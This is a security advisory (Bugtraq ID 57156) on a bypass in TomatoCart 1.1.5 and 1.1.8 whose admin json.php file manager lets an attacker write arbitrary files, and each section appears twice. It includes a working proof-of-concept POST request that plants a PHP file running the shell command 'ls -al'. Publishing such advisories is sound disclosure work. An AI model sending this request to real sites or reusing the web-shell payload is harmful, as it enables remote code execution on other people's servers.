TomatoCart 'json.php' Security Bypass Vulnerability
BID:57156
Info
TomatoCart 'json.php' Security Bypass Vulnerability
| Bugtraq ID: | 57156 |
| Class: | Design Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 04 2013 12:00AM |
| Updated: | Jan 08 2013 05:40AM |
| Credit: | Aung Khant |
| Vulnerable: | |
| Not Vulnerable: | |
Discussion
TomatoCart 'json.php' Security Bypass Vulnerability
TomatoCart is prone to a security-bypass vulnerability.
An attacker can exploit this issue to bypass certain security restrictions and create files with arbitrary shell script which may aid in further attacks.
TomatoCart versions 1.1.5 and 1.1.8 are vulnerable.
TomatoCart is prone to a security-bypass vulnerability.
An attacker can exploit this issue to bypass certain security restrictions and create files with arbitrary shell script which may aid in further attacks.
TomatoCart versions 1.1.5 and 1.1.8 are vulnerable.
Exploit / POC
TomatoCart 'json.php' Security Bypass Vulnerability
Attackers can exploit this issue through a browser.
The following example request is available:
POST /admin/json.php HTTP/1.1
Host: localhost
Cookie: admin_language=en_US; toCAdminID=edfd1d6b88d0c853c2b83cc63aca5e14
Content-Type: application/x-www-form-urlencoded
Content-Length: 195
module=file_manager&action=save_file&file_name=0wned.php&directory=/&token=edfd1d6b88d0c853c2b83cc63aca5e14&ext-comp-1277=0wned.php&content=<?+echo '<h1>0wned!</h1><pre>';+echo `ls+-al`; ?>
Attackers can exploit this issue through a browser.
The following example request is available:
POST /admin/json.php HTTP/1.1
Host: localhost
Cookie: admin_language=en_US; toCAdminID=edfd1d6b88d0c853c2b83cc63aca5e14
Content-Type: application/x-www-form-urlencoded
Content-Length: 195
module=file_manager&action=save_file&file_name=0wned.php&directory=/&token=edfd1d6b88d0c853c2b83cc63aca5e14&ext-comp-1277=0wned.php&content=<?+echo '<h1>0wned!</h1><pre>';+echo `ls+-al`; ?>
Solution / Fix
TomatoCart 'json.php' Security Bypass Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].